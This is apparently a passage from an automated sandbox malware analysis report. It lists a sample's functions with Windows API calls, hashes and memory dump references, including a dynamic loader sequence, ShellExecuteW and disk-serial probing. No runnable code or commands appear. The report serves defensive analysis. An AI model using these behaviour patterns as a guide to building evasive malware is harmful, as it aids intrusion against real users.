                                                                                                                                              • Opcode ID: 387e91a87de461f81f88d0d5442a858492e3e640890d82b1b08078475b4ac16f
                                                                                                                                              • Instruction ID: b508ced69dfa96ce82dbcb0b63266e89f778b224e724a57ccff6e3ff15085e79
                                                                                                                                              • Opcode Fuzzy Hash: 387e91a87de461f81f88d0d5442a858492e3e640890d82b1b08078475b4ac16f
                                                                                                                                              • Instruction Fuzzy Hash: 9D51AE719087419BD710EF24C44066BBBE5FFC9314F14CA1DF98AA7251E7B0EA86CB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041AECC Relevance: 7.7, APIs: 5, Instructions: 172COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 0041AF29
                                                                                                                                              • GetFileType.KERNEL32(?), ref: 0041AFD3
                                                                                                                                              • GetStdHandle.KERNEL32(-000000F6), ref: 0041B054
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileHandleInfoStartupType
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2461013171-0
                                                                                                                                              • Opcode ID: 2d49ff2e1dac1d461a9ba017d4f7fce9fd659b37ad6f8575f489bd24d7f4b863
                                                                                                                                              • Instruction ID: cad9638fdaf26c8eb5ebf78c6630cc0ebb1e4dd1610fc6893beeae660980b453
                                                                                                                                              • Opcode Fuzzy Hash: 2d49ff2e1dac1d461a9ba017d4f7fce9fd659b37ad6f8575f489bd24d7f4b863
                                                                                                                                              • Instruction Fuzzy Hash: AE51E4712057418FC720CF28C8847A77BE0EB15324F298A7EE5A6C72E1D738D89AC759
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0257EA66 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257EAD1
                                                                                                                                              • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0257EAE4
                                                                                                                                              • GetLastError.KERNEL32 ref: 0257EAEF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257EB4D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257EB66
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$ErrorExecuteLastShell
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1794832005-0
                                                                                                                                              • Opcode ID: 942958ca736297a33add4700d822dde069954ec2edf6c2fa64bb55052fb4406a
                                                                                                                                              • Instruction ID: 7426dce7dbe5027bf7af736376174650d2f3a051616072376a2a87d56addddb9
                                                                                                                                              • Opcode Fuzzy Hash: 942958ca736297a33add4700d822dde069954ec2edf6c2fa64bb55052fb4406a
                                                                                                                                              • Instruction Fuzzy Hash: C1316FB0500301AFD720DF14D808B5ABBEAFF84314F14895CF94987291D771989ACF99
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042C704 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 215librarymemoryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,?,0000001B), ref: 0042C73A
                                                                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 0042C8B1
                                                                                                                                              • GetProcAddress.KERNELBASE(?,-00000002), ref: 0042C8E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressAllocLibraryLoadProcVirtual
                                                                                                                                              • String ID: s<O?(Su(
                                                                                                                                              • API String ID: 4074058790-2579506083
                                                                                                                                              • Opcode ID: f2fd0d41c120b0acc762afd2b1f5d72efe51c0065ea40216067eb6c2da04019b
                                                                                                                                              • Instruction ID: 4dfecaa40277070d29589cf71415a5a9c46b68c125777a1cbeafcd6e7af7fa96
                                                                                                                                              • Opcode Fuzzy Hash: f2fd0d41c120b0acc762afd2b1f5d72efe51c0065ea40216067eb6c2da04019b
                                                                                                                                              • Instruction Fuzzy Hash: 63912471E01229DFCB24CFA8D980BADBBF1BF49305F6881AAD845EB341D734A941CB54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025D9760 Relevance: 6.1, APIs: 4, Instructions: 111comCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CoCreateInstance.OLE32(026137A4,00000000,00000001,02613788,?,?,0259AA3A,0000000A), ref: 025D9781
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 025D97EC
                                                                                                                                              • CoSetProxyBlanket.OLE32 ref: 025D981A
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 025D9865
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$BlanketCreateInstanceProxy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 459372342-0
                                                                                                                                              • Opcode ID: 7a65e0bbd0b2a56aaadfea8427cd89b2b59626a12e39972bba5accdecd4cccc1
                                                                                                                                              • Instruction ID: ef27bc3b076f12c38d2072476d5a8b8a1c463265cfc37a660c2816b0cae54cc0
                                                                                                                                              • Opcode Fuzzy Hash: 7a65e0bbd0b2a56aaadfea8427cd89b2b59626a12e39972bba5accdecd4cccc1
                                                                                                                                              • Instruction Fuzzy Hash: FC4161B0A443429FD3209F6DC48862AFBF5BFC4714F14892DE98ACB210EB70D885CB15
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025C98D0 Relevance: 4.6, APIs: 3, Instructions: 51memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 025C9935
                                                                                                                                              • GetLastError.KERNEL32 ref: 025C9948
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025C9961
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectoryErrorFreeHeapLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2326324456-0
                                                                                                                                              • Opcode ID: f9e1e2c2968e5fa683c2755f85cffd20bab0226ea8257ebe05a166709b0411e4
                                                                                                                                              • Instruction ID: ca7384d6450fdddaf11a85f6d74eb8f035c6e6fe850d73de98f3b63f8dec2d88
                                                                                                                                              • Opcode Fuzzy Hash: f9e1e2c2968e5fa683c2755f85cffd20bab0226ea8257ebe05a166709b0411e4
                                                                                                                                              • Instruction Fuzzy Hash: 78115EB15083429FD7289F55D88472BBBE5FF95710F20482DE9C587650E730D844DB9A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025BEE40 Relevance: 4.5, APIs: 3, Instructions: 39threadmemoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 025BEE8A
                                                                                                                                              • SetThreadDescription.KERNELBASE(00000000,?,?,?,?,?,?,?,?,0256EB3C), ref: 025BEE98
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,0256EB3C), ref: 025BEEA7
                                                                                                                                                • Part of subcall function 025C16E0: HeapFree.KERNEL32(00000000,?), ref: 025C1778
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeapThread$CurrentDescription
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2762239883-0
                                                                                                                                              • Opcode ID: fb5b8077efae5d8092707a36ae87be8c753d358fcadcb11241f7a4fcff2b0ed0
                                                                                                                                              • Instruction ID: f41cc710990123eb65c5190dcdc217d6f3d77a412b0dd0ace4a9f3afee25d88b
                                                                                                                                              • Opcode Fuzzy Hash: fb5b8077efae5d8092707a36ae87be8c753d358fcadcb11241f7a4fcff2b0ed0
                                                                                                                                              • Instruction Fuzzy Hash: 25F0A475A041029FC714AA54EC09BAF7776BFC0314F548D2CE84987144E7309894CB8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025E65E2 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 025E662E
                                                                                                                                              • GetFileType.KERNELBASE(00000000), ref: 025E6640
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileHandleType
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3000768030-0
                                                                                                                                              • Opcode ID: 3a8d265d7436f248c25574c8b28e521f8651df04f5fc998e26b8b347e887a28f
                                                                                                                                              • Instruction ID: 5ce1bfe6d547c452b3ab5e2ff3fcb50a8eb1a21e7b3e4373bf3f835e90b0b20d
                                                                                                                                              • Opcode Fuzzy Hash: 3a8d265d7436f248c25574c8b28e521f8651df04f5fc998e26b8b347e887a28f
                                                                                                                                              • Instruction Fuzzy Hash: 781103F15247414ACF384E3E9C88623BE9CB7762B4B290B5AE5B7C25F1C330D586C649
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025D96A2 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CoInitializeEx.OLE32 ref: 025D96B8
                                                                                                                                              • CoInitializeSecurity.OLE32 ref: 025D96E4
                                                                                                                                                • Part of subcall function 025D8B49: GetErrorInfo.OLEAUT32(00000000,?,?,02580204,?,000000FF,00000001,?,?), ref: 025D8B5C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Initialize$ErrorInfoSecurity
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3572798514-0
                                                                                                                                              • Opcode ID: 738ed9fea0d50f61cf3b7d07793ff43b474b057910ef39b162456b0f15a1ec38
                                                                                                                                              • Instruction ID: ef3db5bf5981c487b9534f22c7b44450ceaa48285ec31f29ad7dd6f64aba8dd2
                                                                                                                                              • Opcode Fuzzy Hash: 738ed9fea0d50f61cf3b7d07793ff43b474b057910ef39b162456b0f15a1ec38
                                                                                                                                              • Instruction Fuzzy Hash: D9116A759087028BD764AF7DD50926ABBF0BF85218F048A2DD9C996221FB30E5D4CB46
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0256ED80 Relevance: 3.0, APIs: 2, Instructions: 48memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FreeConsole.KERNEL32 ref: 0256EDC1
                                                                                                                                                • Part of subcall function 02591E40: HeapFree.KERNEL32(00000000,?), ref: 02591FCF
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 0256EDF6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Free$Heap$Console
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2715786339-0
                                                                                                                                              • Opcode ID: 7597654d3ad681da1decc7d66c3477de9babbf6b88ba928b45b4c0fce01ce6f9
                                                                                                                                              • Instruction ID: 48c580afbc120fb016b27b37c58e0518e429509667f8af1198976ab81c0d9b27
                                                                                                                                              • Opcode Fuzzy Hash: 7597654d3ad681da1decc7d66c3477de9babbf6b88ba928b45b4c0fce01ce6f9
                                                                                                                                              • Instruction Fuzzy Hash: 4501D6FAC811065BC7747B35EC0EA6E7B39BF90240F045424E81886244E734622DCFDE
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00418875 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,00415EAC,00000001,?,0043A478,00000060), ref: 00418886
                                                                                                                                                • Part of subcall function 004188C6: HeapAlloc.KERNEL32(00000000,00000140,004188AE,000003F8,?,0043A478,00000060), ref: 004188D3
                                                                                                                                              • HeapDestroy.KERNEL32(?,0043A478,00000060), ref: 004188B9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocCreateDestroy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2236781399-0
                                                                                                                                              • Opcode ID: 081eba9be5826635cbb7a29082c7bc61fc15faa81be005bd4fff385f22785363
                                                                                                                                              • Instruction ID: 558faf22d0d10c49c59805d7195a1265b1ee3e9db6c9b0bb3573a997b10f9ed6
                                                                                                                                              • Opcode Fuzzy Hash: 081eba9be5826635cbb7a29082c7bc61fc15faa81be005bd4fff385f22785363
                                                                                                                                              • Instruction Fuzzy Hash: C3E09A78B113029AEF507B70AC057AA3BE4EB64746FC4883EB404C50A8EF2888849A0C
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025CD330 Relevance: 1.5, APIs: 1, Instructions: 2COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 0feb59d42df1779b953abbd346d45c634504067f4333d6dbf2f440735a7346b2
                                                                                                                                              • Instruction ID: e7643214fd2a533918b3c2fba7c6d804e3279d3c18b8162a5738ce92749cc464
                                                                                                                                              • Opcode Fuzzy Hash: 0feb59d42df1779b953abbd346d45c634504067f4333d6dbf2f440735a7346b2
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 0040A770 Relevance: 88.6, APIs: 34, Strings: 16, Instructions: 1068fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040A740: GetVersionExA.KERNEL32(00000000), ref: 0040A753
                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,?), ref: 0040A7CC
                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,0004D008,?,0000003C,?,0000022D,?,00000000), ref: 0040A86E
                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,SCSIDISK,00000008), ref: 0040A8BA
                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 0040A9B2
                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 0040A9E9
                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,?,00000018,?,00000000), ref: 0040AA7B
                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040ADB1
                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000000), ref: 0040AEE7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CloseControlCreateDeviceHandle$CopyDirectorySystemVersion
                                                                                                                                              • String ID: DISKSERIAL$DiskSerial$DiskSerial.VXD$IOSUBSYS\SMARTVSD.VXD$L$SCSIDISK$SMARTVSD.VXD$\$\$\DiskSerial.VXD$\IOSUBSYS\SMARTVSD.VXD$\SMARTVSD.VXD$\\.\DiskSerial.vxd$\\.\PhysicalDrive%d$\\.\SMARTVSD$\\.\Scsi%d:
                                                                                                                                              • API String ID: 1683039047-3280731534
                                                                                                                                              • Opcode ID: 5381b5551287e4adfd786a5f55f6f4a67c4bd9771a8bb3c3fab6e6aed8b98872
                                                                                                                                              • Instruction ID: 93a60672a8556de03baec2beb5f329e244e6174530f919b371a39b0e8372696b
                                                                                                                                              • Opcode Fuzzy Hash: 5381b5551287e4adfd786a5f55f6f4a67c4bd9771a8bb3c3fab6e6aed8b98872
                                                                                                                                              • Instruction Fuzzy Hash: FA7246723003045BE328DA389C46BEB77D5EBC4310F544A3EFA5A9B2C0DEB99909C759
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0257771C Relevance: 87.8, APIs: 53, Strings: 4, Instructions: 2345memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025D04D0: TlsGetValue.KERNEL32(00000000), ref: 025D04E9
                                                                                                                                                • Part of subcall function 025D04D0: TlsGetValue.KERNEL32(00000000), ref: 025D0510
                                                                                                                                                • Part of subcall function 025D04D0: TlsSetValue.KERNEL32(00000000,00000000), ref: 025D055E
                                                                                                                                                • Part of subcall function 025D04D0: BCryptGenRandom.BCRYPT(00000000,?,00000010,00000002), ref: 025D0574
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02577B39
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02577B7D
                                                                                                                                                • Part of subcall function 0257D120: HeapFree.KERNEL32(00000000,?,?,?,?,0257735D), ref: 0257D16E
                                                                                                                                                • Part of subcall function 025728BD: HeapFree.KERNEL32(00000000,?,?,0257F7AE,?,025FF438,0260D02C), ref: 0257295C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02577B96
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02577C8E
                                                                                                                                                • Part of subcall function 02572678: HeapFree.KERNEL32(00000000,?,025812D5), ref: 0257269A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578000
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578019
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578508
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257858A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025785DC
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578661
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025786AF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025786CC
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257889D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578A33
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578B5A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578D80
                                                                                                                                                • Part of subcall function 025C6A20: SetLastError.KERNEL32(00000000), ref: 025C6AE3
                                                                                                                                                • Part of subcall function 025C6A20: GetLastError.KERNEL32 ref: 025C6AF8
                                                                                                                                                • Part of subcall function 025C6A20: GetLastError.KERNEL32 ref: 025C6B0A
                                                                                                                                                • Part of subcall function 025C6A20: HeapFree.KERNEL32(00000000,00000002), ref: 025C6B80
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578EA7
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025790AA
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579222
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025792B9
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579318
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025793A3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579551
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257956A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579583
                                                                                                                                              • GetLastError.KERNEL32 ref: 02579693
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579803
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257988A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025798DC
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257992A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257994B
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257996A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579995
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025799B2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025799E0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579A84
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579AA9
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579BA4
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579CFB
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579D14
                                                                                                                                              • GetLastError.KERNEL32 ref: 02579D2E
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579D61
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579D7E
                                                                                                                                              • GetLastError.KERNEL32 ref: 02579DC0
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02579E1A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579E77
                                                                                                                                                • Part of subcall function 025617D0: HeapFree.KERNEL32(00000000,?), ref: 02561998
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579EC8
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579EE1
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579EFA
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579F2C
                                                                                                                                                • Part of subcall function 0257FB9E: HeapFree.KERNEL32(00000000,?), ref: 0257FBD0
                                                                                                                                                • Part of subcall function 0257FB9E: HeapFree.KERNEL32(00000000,00000000), ref: 0257FBDF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579F7C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579FA0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579FBA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
